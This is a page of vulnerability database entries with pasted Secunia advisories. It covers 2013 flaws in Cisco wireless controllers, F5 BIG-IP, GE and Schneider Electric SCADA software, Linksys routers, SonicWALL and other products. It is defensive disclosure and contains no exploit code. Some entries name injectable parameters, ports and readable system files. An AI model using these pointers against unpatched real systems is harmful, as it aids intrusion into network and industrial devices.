VARIoT IoT vulnerabilities database
| VAR-201301-0345 | CVE-2013-1104 |
Cisco Wireless LAN Controller Arbitrary Code Execution Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201301-0211 |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
The HTTP Profiling functionality on Cisco Wireless LAN Controller (WLC) devices with software 7.3.101.0 allows remote authenticated users to execute arbitrary code via a crafted HTTP User-Agent header, aka Bug ID CSCuc15636. The Cisco Wireless LAN Controller is responsible for system-wide wireless LAN functions such as security policy, intrusion protection, RF management, quality of service, and mobility. Cisco Wireless LAN Controllers fail to properly filter user-supplied input, so an authenticated remote attacker can send a specially crafted User-Agent string over wired or wireless segments. The software mishandles such strings, allowing the attacker to execute arbitrary code on the system. Other attacks may also be possible.
----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
----------------------------------------------------------------------
TITLE:
Cisco Wireless LAN Controllers Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA51965
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/51965/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=51965
RELEASE DATE:
2013-01-24
DISCUSS ADVISORY:
http://secunia.com/advisories/51965/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/51965/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=51965
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Cisco Wireless Lan
Controllers, which can be exploited by malicious users to bypass
certain security restrictions and compromise a vulnerable system and
by malicious people to cause a DoS (Denial of Service).
1) An error within the wIPS component when handling certain IP
packets can be exploited to cause a reload.
Successful exploitation requires that Cisco WLCs are configured with
Wireless Intrusion Prevention System (wIPS).
2) An error when handling certain Session Initiation Protocol (SIP)
packets can be exploited to cause a reload.
4) An error when handling access restrictions can be exploited to
view or modify sensitive information such as configuration files.
The vulnerabilities are reported in the following products:
* Cisco 2000 Series WLC
* Cisco 2100 Series WLC
* Cisco 2500 Series WLC
* Cisco 4100 Series WLC
* Cisco 4400 Series WLC
* Cisco 5500 Series WLC
* Cisco 7500 Series WLC
* Cisco 8500 Series WLC
* Cisco 500 Series Wireless Express Mobility Controllers
* Cisco Wireless Services Module (Cisco WiSM)
* Cisco Wireless Services Module version 2 (Cisco WiSM version 2)
* Cisco NME-AIR-WLC Module for Integrated Services Routers (ISRs)
* Cisco NM-AIR-WLC Module for Integrated Services Routers (ISRs)
* Cisco Catalyst 3750G Integrated WLCs
* Cisco Flex 7500 Series Cloud Controller
* Cisco Virtual Wireless Controller
* Cisco Wireless Controller Software for Integrated Services Module
300 and Cisco Services-Ready Engine 700, 710, 900, and 910
SOLUTION:
Apply update (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY:
#1, #2, #3) Reported by the vendor.
#4) The vendor credits Darren Johnson.
ORIGINAL ADVISORY:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130123-wlc
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201301-0346 | CVE-2013-1105 |
Cisco Wireless LAN Controller Vulnerability in which wireless management settings can be bypassed
Related entries in the VARIoT exploits database: VAR-E-201301-0211 |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.3, 7.1 and 7.2 before 7.2.111.3, and 7.3 before 7.3.101.0 allow remote authenticated users to bypass wireless-management settings and read or modify the device configuration via an SNMP request, aka Bug ID CSCua60653. The Cisco Wireless LAN Controller is responsible for system-wide wireless LAN functions such as security policy, intrusion protection, RF management, quality of service, and mobility.
Exploiting these issues could allow an attacker to deny service to legitimate users, execute arbitrary code, or gain unauthorized access. Other attacks may also be possible. ----------------------------------------------------------------------
TITLE:
Cisco Wireless LAN Controllers Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA51965
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/51965/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=51965
RELEASE DATE:
2013-01-24
DISCUSS ADVISORY:
http://secunia.com/advisories/51965/#comments
DESCRIPTION:
Multiple vulnerabilities have been reported in Cisco Wireless Lan
Controllers, which can be exploited by malicious users to bypass
certain security restrictions and compromise a vulnerable system and
by malicious people to cause a DoS (Denial of Service).
1) An error within the wIPS component when handling certain IP
packets can be exploited to cause a reload.
Successful exploitation requires that Cisco WLCs are configured with
Wireless Intrusion Prevention System (wIPS).
2) An error when handling certain Session Initiation Protocol (SIP)
packets can be exploited to cause a reload.
3) An input sanitisation error can be exploited to execute arbitrary
code by sending a specially crafted UserAgent string.
4) An error when handling access restrictions can be exploited to
view or modify sensitive information such as configuration files.
The vulnerabilities are reported in the following products:
* Cisco 2000 Series WLC
* Cisco 2100 Series WLC
* Cisco 2500 Series WLC
* Cisco 4100 Series WLC
* Cisco 4400 Series WLC
* Cisco 5500 Series WLC
* Cisco 7500 Series WLC
* Cisco 8500 Series WLC
* Cisco 500 Series Wireless Express Mobility Controllers
* Cisco Wireless Services Module (Cisco WiSM)
* Cisco Wireless Services Module version 2 (Cisco WiSM version 2)
* Cisco NME-AIR-WLC Module for Integrated Services Routers (ISRs)
* Cisco NM-AIR-WLC Module for Integrated Services Routers (ISRs)
* Cisco Catalyst 3750G Integrated WLCs
* Cisco Flex 7500 Series Cloud Controller
* Cisco Virtual Wireless Controller
* Cisco Wireless Controller Software for Integrated Services Module
300 and Cisco Services-Ready Engine 700, 710, 900, and 910
SOLUTION:
Apply update (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY:
#1, #2, #3) Reported by the vendor.
#4) The vendor credits Darren Johnson.
ORIGINAL ADVISORY:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130123-wlc
----------------------------------------------------------------------
| VAR-201301-0447 | No CVE | SAP NetWeaver SDM Multiple Security Vulnerabilities |
CVSS V2: - CVSS V3: - Severity: MEDIUM |
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP NetWeaver SDM service has an unspecified error that allows an attacker to exploit a vulnerability to bypass authentication and perform restricted operations. SAP NetWeaver is prone to multiple security vulnerabilities. ----------------------------------------------------------------------
TITLE:
SAP NetWeaver SDM Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA51740
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/51740/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=51740
RELEASE DATE:
2013-01-23
DISCUSS ADVISORY:
http://secunia.com/advisories/51740/#comments
DESCRIPTION:
ERPScan has reported multiple vulnerabilities in SAP NetWeaver, which
can be exploited by malicious people to disclose certain sensitive
information, bypass certain security restrictions, and cause a DoS
(Denial of Service).
SOLUTION:
Apply SAP Note 1724516.
PROVIDED AND/OR DISCOVERED BY:
Alexander Polyakov, ERPScan.
ORIGINAL ADVISORY:
SAP:
https://service.sap.com/sap/support/notes/1724516
ERPScan (DSECRG-12-044, DSECRG-12-045, DSECRG-12-046, DSECRG-12-047,
DSECRG-12-048):
http://erpscan.com/advisories/dsecrg-12-044-sap-netweaver-sdm-authentication-bypass/
http://erpscan.com/advisories/dsecrg-12-045-sap-netweaver-sdm-denial-of-service/
http://erpscan.com/advisories/dsecrg-12-046-sap-netweaver-sdm-information-disclosure-and-smbrelay/
http://erpscan.com/advisories/dsecrg-12-047-sap-netweaver-sdm-admin-information-disclosure/
http://erpscan.com/advisories/dsecrg-12-048-sap-netweaver-sdm-admin-dos/
----------------------------------------------------------------------
| VAR-201401-0017 | CVE-2012-3000 |
SQL injection vulnerability in the APM WebGUI and AVR WebGUI of multiple F5 BIG-IP products
Related entries in the VARIoT exploits database: VAR-E-201301-0068 |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Multiple SQL injection vulnerabilities in sam/admin/reports/php/saveSettings.php in the (1) APM WebGUI in F5 BIG-IP LTM, GTM, ASM, Link Controller, PSM, APM, Edge Gateway, and Analytics and (2) AVR WebGUI in WebAccelerator and WOM 11.2.x before 11.2.0-HF3 and 11.2.x before 11.2.1-HF3 allow remote authenticated users to execute arbitrary SQL commands via the defaultQuery parameter. F5 BIG-IP is an application switch. F5 BIG-IP saveSettings.php fails to properly filter user-submitted input. An authenticated attacker can exploit this vulnerability to submit a malicious SQL query that can access MySQL database information or access system files in the context of the "mysql" OS user. Successful exploitation may require that Application Security (ASM) or Access Policy (APM) is enabled.
Versions prior to F5 BIG-IP 11.2.0 are vulnerable. F5 BIG-IP LTM, etc. are all products of F5 Company in the United States. LTM is a local traffic manager; GTM is a wide area traffic manager; WebAccelerator is an application accelerator. The vulnerability is caused by the sam/admin/reports/php/saveSettings.php script not adequately filtering the 'defaultQuery' parameter. A remote attacker can exploit this vulnerability to execute arbitrary SQL commands. ----------------------------------------------------------------------
TITLE:
F5 Products "defaultQuery" SQL Injection Vulnerability
SECUNIA ADVISORY ID:
SA51867
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/51867/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=51867
RELEASE DATE:
2013-01-25
DISCUSS ADVISORY:
http://secunia.com/advisories/51867/#comments
DESCRIPTION:
SEC Consult has reported a vulnerability in F5 Products, which can be
exploited by malicious users to conduct SQL injection attacks. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.
The vulnerability is reported in the following products:
* BIG-IP LTM version 11.x
* BIG-IP GTM version 11.x
* BIG-IP ASM version 11.x
* BIG-IP Link Controller version 11.x
* BIG-IP PSM version 11.x
* BIG-IP APM version 11.x
* BIG-IP Edge Gateway version 11.x
* BIG-IP Analytics version 11.x
SOLUTION:
Update to a fixed version (Please see vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY:
Stefan Viehböck, SEC Consult.
ORIGINAL ADVISORY:
sol14154:
http://support.f5.com/kb/en-us/solutions/public/14000/100/sol14154.html
SEC Consult:
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130122-1_F5_BIG-IP_SQL_Injection_v10.txt
----------------------------------------------------------------------
| VAR-201301-0369 | CVE-2013-0651 | GE Proficy Real-Time Information Portal Multiple Information Disclosure Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The Portal installation process in GE Intelligent Platforms Proficy Real-Time Information Portal stores sensitive information under the web root with insufficient access control, which allows remote attackers to read configuration files, and discover data-source credentials, via a direct request. GE Proficy Real-Time Information Portal is a real-time manufacturing intelligence application from GE Intelligent Platforms.
Attackers can exploit these issues to gain access to sensitive information that may aid in further attacks. ----------------------------------------------------------------------
TITLE:
Proficy Real-Time Information Portal Two Information Disclosure
Security Issues
SECUNIA ADVISORY ID:
SA51746
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/51746/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=51746
RELEASE DATE:
2013-01-23
DISCUSS ADVISORY:
http://secunia.com/advisories/51746/#comments
DESCRIPTION:
Two security issues have been reported in Proficy Real-Time
Information Portal, which can be exploited by malicious people to
disclose certain sensitive information.
1) The application provides unrestricted access to certain files and
directories, which can be exploited to e.g. retrieve configuration
files.
2) The application exposes certain methods via Java RMI, which can be
exploited to disclose information via RMI call.
The security issues are reported in all supported versions.
SOLUTION:
Apply updates (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
ICSA-13-022-01:
http://www.us-cert.gov/control_systems/pdf/ICSA-13-022-01.pdf
----------------------------------------------------------------------
| VAR-201301-0370 | CVE-2013-0652 | GE Proficy Real-Time Information Portal Multiple Information Disclosure Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
GE Intelligent Platforms Proficy Real-Time Information Portal does not restrict access to methods of an unspecified Java class, which allows remote attackers to obtain a username listing via an RMI call.
Attackers can exploit these issues to gain access to sensitive information that may aid in further attacks. ----------------------------------------------------------------------
TITLE:
Proficy Real-Time Information Portal Two Information Disclosure
Security Issues
SECUNIA ADVISORY ID:
SA51746
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/51746/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=51746
RELEASE DATE:
2013-01-23
DISCUSS ADVISORY:
http://secunia.com/advisories/51746/#comments
DESCRIPTION:
Two security issues have been reported in Proficy Real-Time
Information Portal, which can be exploited by malicious people to
disclose certain sensitive information.
1) The application provides unrestricted access to certain files and
directories, which can be exploited to e.g. retrieve configuration
files.
The security issues are reported in all supported versions.
SOLUTION:
Apply updates (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
ICSA-13-022-01:
http://www.us-cert.gov/control_systems/pdf/ICSA-13-022-01.pdf
----------------------------------------------------------------------
| VAR-201301-0371 | CVE-2013-0653 | GE Proficy CIMPLICITY Directory Traversal Vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in substitute.bcl in the WebView CimWeb subsystem in GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY 4.01 through 8.0, and Proficy Process Systems with CIMPLICITY, allows remote attackers to read arbitrary files via a crafted packet. GE Intelligent Platforms provides software and hardware products, services and expertise for users in the automation control and embedded fields. GE Proficy CIMPLICITY is PC configuration software. The GE Proficy CIMPLICITY WebView CimWeb component (substitute.bcl) does not properly check input variables; by sending malicious packets to TCP port 80, attackers can view and download files on the server through directory traversal attacks. The CIMPLICITY component is prone to a directory-traversal vulnerability and a remote command-execution vulnerability because it fails to properly validate user-supplied data. Failed exploit attempts will result in a denial-of-service condition.
----------------------------------------------------------------------
TITLE:
GE Intelligent Platforms Products Two Vulnerabilities
SECUNIA ADVISORY ID:
SA51936
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/51936/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=51936
RELEASE DATE:
2013-01-24
DISCUSS ADVISORY:
http://secunia.com/advisories/51936/#comments
DESCRIPTION:
Two vulnerabilities have been reported in GE Intelligent Platforms
products, which can be exploited by malicious users to disclose
certain sensitive information and compromise a vulnerable system.
2) An unspecified error exists in CimWebServer when processing
packets and can be exploited to e.g. run arbitrary commands by
sending a specially-crafted packet.
NOTE: CIMPLICITY built-in Web server component is not enabled by
default.
The vulnerabilities are reported in the following products:
* Proficy HMI/SCADA – CIMPLICITY version 4.01 and greater
* Proficy Process Systems with CIMPLICITY
SOLUTION:
Apply updates (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
ICSA-13-022-02:
http://www.us-cert.gov/control_systems/pdf/ICSA-13-022-02.pdf
| VAR-201301-0372 | CVE-2013-0654 | GE Proficy CIMPLICITY Command execution vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
CimWebServer in GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY 4.01 through 8.0, and Proficy Process Systems with CIMPLICITY, allows remote attackers to execute arbitrary commands or cause a denial of service (daemon crash) via a crafted packet. GE Intelligent Platforms provides software and hardware products, services and expertise for users in the automation control and embedded fields. GE Proficy CIMPLICITY is PC configuration software. The CIMPLICITY component is prone to a directory-traversal vulnerability and a remote command-execution vulnerability because it fails to properly validate user-supplied data. Failed exploit attempts will result in a denial-of-service condition.
TITLE:
GE Intelligent Platforms Products Two Vulnerabilities
SECUNIA ADVISORY ID:
SA51936
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/51936/
RELEASE DATE:
2013-01-24
DESCRIPTION:
Two vulnerabilities have been reported in GE Intelligent Platforms
products, which can be exploited by malicious users to disclose
certain sensitive information and compromise a vulnerable system.
1) An unspecified error exists within the WebView CimWeb component
(substitute.bcl) and can be exploited to disclose arbitrary files via
directory traversal attacks.
2) An unspecified error exists in CimWebServer when processing
packets and can be exploited to e.g. run arbitrary commands by
sending a specially-crafted packet.
NOTE: CIMPLICITY built-in Web server component is not enabled by
default.
The vulnerabilities are reported in the following products:
* Proficy HMI/SCADA – CIMPLICITY version 4.01 and greater
* Proficy Process Systems with CIMPLICITY
SOLUTION:
Apply updates (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
ICSA-13-022-02:
http://www.us-cert.gov/control_systems/pdf/ICSA-13-022-02.pdf
| VAR-201401-0042 | CVE-2013-1361 | Lenovo Thinkpad Bluetooth with Enhanced Data Rate Software arbitrary code execution vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Untrusted search path vulnerability in Lenovo Thinkpad Bluetooth with Enhanced Data Rate Software 6.4.0.2900 and earlier allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse DLL that is located in the same folder as a file that is processed by Lenovo Bluetooth. Supplementary information: the vulnerability type has been identified as CWE-426: Untrusted Search Path.
Attackers can exploit this vulnerability to execute arbitrary code in the context of the user running the vulnerable application.
Bluetooth with Enhanced Data Rate Software 6.4.0.2900 is vulnerable; other versions may also be affected.
TITLE:
Lenovo Bluetooth with Enhanced Data Rate Software Insecure Library
Loading Vulnerability
SECUNIA ADVISORY ID:
SA51846
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/51846/
RELEASE DATE:
2013-01-22
DESCRIPTION:
Microsoft has reported a vulnerability in Lenovo Bluetooth with
Enhanced Data Rate Software, which can be exploited by malicious
people to compromise a user's system.
The vulnerability is caused due to the application loading libraries
in an insecure manner. This can be exploited to load arbitrary
libraries by tricking a user into opening certain files on a remote
WebDAV or SMB share.
Successful exploitation allows execution of arbitrary code.
The vulnerability is reported in versions 6.4.0.2900 and prior.
SOLUTION:
Update to version 6.5.1.2700.
PROVIDED AND/OR DISCOVERED BY:
Haifei Li, Microsoft.
ORIGINAL ADVISORY:
Lenovo:
http://download.lenovo.com/ibmdl/pub/pc/pccbbs/mobiles/g4wb10ww.txt
MSVR:
http://technet.microsoft.com/en-us/security/msvr/msvr13-001
| VAR-201301-0440 | CVE-2013-0843 | Google Chrome on Mac OS X denial-of-service (DoS) vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
content/renderer/media/webrtc_audio_renderer.cc in Google Chrome before 24.0.1312.56 on Mac OS X does not use an appropriate buffer size for the 96 kHz sampling rate, which allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a web site that provides WebRTC audio. Google Chrome is prone to multiple security vulnerabilities.
Attackers can exploit these issues to execute arbitrary code in the context of the browser, bypass security restrictions, or cause denial-of-service conditions; other attacks may also be possible.
Versions prior to Chrome 24.0.1312.56 are vulnerable.
This BID is being retired. The following individual records exist to better document the issues:
59680 Google Chrome CVE-2013-0842 Unspecified Security Vulnerability
59681 Google Chrome CVE-2013-0840 Unspecified Security Vulnerability
59682 Google Chrome CVE-2013-0841 Unspecified Security Vulnerability
59685 Google Chrome CVE-2013-0843 Denial of Service Vulnerability
59683 Google Chrome CVE-2013-0839 Use-After-Free Memory Corruption Vulnerability.
Attackers can exploit this issue to crash the application, denying service to legitimate users.
TITLE:
Google Chrome Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA51935
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/51935/
RELEASE DATE:
2013-01-23
DESCRIPTION:
Multiple vulnerabilities have been reported in Google Chrome, where
some have unknown impacts and others can be exploited by malicious
people to compromise a user's system.
1) A use-after-free error exists when handling canvas font.
2) An error exists when validating the URL when opening new windows.
3) An array indexing error exists when blocking certain contents.
4) An error exists when handling NULL characters embedded in paths.
5) An error exists when handling unsupported RTC sampling rate.
NOTE: This vulnerability affects Mac only.
SOLUTION:
Update to version 24.0.1312.56.
PROVIDED AND/OR DISCOVERED BY:
2) Reported by the vendor.
The vendor credits:
1) Atte Kettunen, OUSPG.
5) Ted Nakamura, Chromium development community.
ORIGINAL ADVISORY:
http://googlechromereleases.blogspot.com/2013/01/stable-channel-update_22.html
| VAR-201401-0016 | CVE-2012-2997 |
XML external entity vulnerability in sam/admin/vpe2/public/php/server.php in F5 BIG-IP
Related entries in the VARIoT exploits database: VAR-E-201301-0169 |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
XML External Entity (XXE) vulnerability in sam/admin/vpe2/public/php/server.php in F5 BIG-IP 10.0.0 through 10.2.4 and 11.0.0 through 11.2.1 allows remote authenticated users to read arbitrary files via a crafted XML file. F5 BIG-IP is an application switch. The vulnerability allows authenticated attackers to download arbitrary files from the system in the context of the "apache" OS user. The BIG-IP configuration allows users to access the /etc/shadow file to obtain user password hashes.
Attackers can exploit this issue to obtain potentially sensitive information from local files on computers running the vulnerable application and to carry out other attacks. F5 BIG-IP is an all-in-one network device from F5 Corporation of the United States that integrates network traffic management, application security management, load balancing and other functions.
TITLE:
F5 Products XML Entity References Information Disclosure
Vulnerability
SECUNIA ADVISORY ID:
SA51986
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/51986/
RELEASE DATE:
2013-01-25
DESCRIPTION:
SEC Consult has reported a vulnerability in F5 Products, which can be
exploited by malicious users to disclose certain sensitive
information.
The vulnerability is caused due to an error in the web interface XML
parser when validating XML requests and can be exploited to e.g.
disclose local files.
The vulnerability is reported in the following products:
* BIG-IP LTM versions 10.x and 11.x
* BIG-IP GTM versions 10.x and 11.x
* BIG-IP ASM versions 10.x and 11.x
* BIG-IP Link Controller versions 10.x and 11.x
* BIG-IP WebAccelerator versions 10.x and 11.x
* BIG-IP PSM versions 10.x and 11.x
* BIG-IP WOM versions 10.x and 11.x
* BIG-IP APM versions 10.x and 11.x
* BIG-IP Edge Gateway versions 10.x and 11.x
* BIG-IP Analytics version 11.x
SOLUTION:
Update to a fixed version (Please see vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY:
Stefan Viehböck, SEC Consult.
ORIGINAL ADVISORY:
sol14138:
http://support.f5.com/kb/en-us/solutions/public/14000/100/sol14138.html
SEC Consult:
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130122-0_F5_BIG-IP_XML_External_Entity_Injection_v10.txt
| VAR-201302-0261 | CVE-2013-0658 |
Schneider Electric Accutech Manager Heap Buffer Overflow Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201301-0209 |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in RFManagerService.exe in Schneider Electric Accutech Manager 2.00.1 and earlier allows remote attackers to execute arbitrary code via a crafted HTTP request. Schneider Electric Accutech Manager is real-time monitoring and management software that runs as a Windows service. Accutech Manager is prone to a remote heap-based buffer-overflow vulnerability. Failed exploit attempts will result in a denial-of-service condition.
Accutech Manager 2.00.1 and prior are vulnerable.
TITLE:
Schneider Electric Accutech Manager Buffer Overflow Vulnerability
SECUNIA ADVISORY ID:
SA52034
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/52034/
RELEASE DATE:
2013-01-31
DESCRIPTION:
A vulnerability has been reported in Schneider Electric Accutech
Manager, which can be exploited by malicious people to compromise a
vulnerable system.
The vulnerability is caused due to an unspecified error and can be
exploited to cause a heap-based buffer overflow.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in versions 2.00.1 and prior.
SOLUTION:
No official solution is currently available. A fix is scheduled to be
released in February 2013.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits Exodus Intelligence.
ORIGINAL ADVISORY:
http://www.schneider-electric.com/sites/corporate/en/support/cybersecurity/viewer-news.page?c_filepath=/templatedata/Content/News/data/en/local/cybersecurity/general_information/2013/01/20130121_advisory_of_vulnerability_affecting_accutech_manager_software.xml
| VAR-201301-0349 | CVE-2013-1110 | Cisco WebEx Training Center privilege restriction bypass vulnerability |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
Cisco WebEx Training Center allows remote authenticated users to bypass intended privilege restrictions and (1) enable or (2) disable training-center recordings via a crafted URL, aka Bug ID CSCzu81065.
Attackers can exploit this issue to bypass security restrictions to perform unauthorized actions; this may aid in launching further attacks. Cisco WebEx is a set of Web conferencing tools developed by Cisco that helps office workers in different locations coordinate and cooperate. WebEx services include Web conferencing, telepresence video conferencing and enterprise instant messaging (IM).
| VAR-201301-0469 | No CVE | Cisco Linksys WRT54GL Router Multiple Security Vulnerabilities |
CVSS V2: - CVSS V3: - Severity: - |
Allows an attacker to perform malicious actions. The Cisco Linksys WRT54GL Router is a wireless routing device. A security vulnerability exists in the Cisco Linksys WRT54GL Router. Due to the lack of filtering on the wan_hostnam parameter, an attacker can exploit the vulnerability to inject and execute arbitrary shell commands. Because changing the password does not require supplying the current password, an attacker can submit a malicious request to change the password.
1. A command-execution vulnerability
2. A security-bypass vulnerability
3. A cross-site request-forgery vulnerability
4. A cross-site scripting vulnerability
5.
Cisco Linksys WRT54GL 1.1 running firmware version 4.30.15 build 2 is vulnerable; other versions may also be affected.
| VAR-201301-0452 | No CVE | Schneider Electric Interactive Graphical SCADA System Data Collector Buffer Overflow Vulnerability |
CVSS V2: - CVSS V3: - Severity: HIGH |
Schneider Electric and the 7T Interactive Graphical SCADA System are automated monitoring and control systems. The Interactive Graphical SCADA System has an unspecified error in dc.exe when processing certain requests, allowing an attacker to submit a malicious request to TCP port 12397 to trigger a buffer overflow that can crash the application service.
TITLE:
Schneider Electric Interactive Graphical SCADA System Data Collector
Buffer Overflow Vulnerability
SECUNIA ADVISORY ID:
SA51819
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/51819/
RELEASE DATE:
2013-01-17
DESCRIPTION:
A vulnerability has been reported in Schneider Electric Interactive
Graphical SCADA System, which can be exploited by malicious people to
compromise a vulnerable system.
SOLUTION:
Apply patch.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits Aaron Portnoy, Exodus Intelligence.
ORIGINAL ADVISORY:
http://www2.schneider-electric.com/sites/corporate/en/support/cybersecurity/cyber-security-vulnerabilities-sorted.page
http://www2.schneider-electric.com/corporate/en/support/cybersecurity/viewer-news.page?c_filepath=/templatedata/Content/News/data/en/local/cybersecurity/general_information/2013/01/20130110_advisory_of_vulnerability_affecting_igss_scada_software.xml
| VAR-201405-0018 | CVE-2012-6452 | User enumeration vulnerability in Axway Secure Messenger as used in Axway Email Firewall |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Axway Secure Messenger before 6.5 Updated Release 7, as used in Axway Email Firewall, provides different responses to authentication requests depending on whether the user exists, which allows remote attackers to enumerate users via a series of requests. Axway Secure Messenger is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to retrieve sensitive information. Information harvested may aid in launching further attacks.
Axway Secure Messenger 6.5 is vulnerable; other versions may also be affected. Axway Secure Messenger is a suite of email encryption software from Axway, France. The software supports encrypting and authenticating emails, automating tracking of message delivery, and more. Specifically, two (2) JSESSIONIDs are returned for valid users, and one (1) for invalid users.
Solution:
Upgrade to Secure Messenger version 6.5 Updated Release 7, or migrate to Axway MailGate 5.2.0 (or later) for the equivalent functionality.
Contact:
support.axway.com
| VAR-201301-0573 | No CVE | Watson Management Console Directory Traversal Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
Watson SHDSL Routers are router devices. The Watson management console on Watson SHDSL Routers does not properly filter user-submitted HTTP requests, allowing attackers to perform directory traversal attacks and obtain sensitive file information.
| VAR-202002-0533 | CVE-2013-1360 | Authentication vulnerabilities in multiple SonicWALL products |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
An Authentication Bypass vulnerability exists in DELL SonicWALL Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0, Analyzer 7.0, Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, and 6.0 via a crafted request to the SGMS interface, which could let a remote malicious user obtain administrative access. Multiple SonicWALL products contain an authentication vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS).
Attackers can exploit this issue to gain administrative access to the web interface that could fully compromise the system.
The following versions are affected:
GMS/Analyzer/UMA 7.0.x
GMS/ViewPoint/UMA 6.0.x
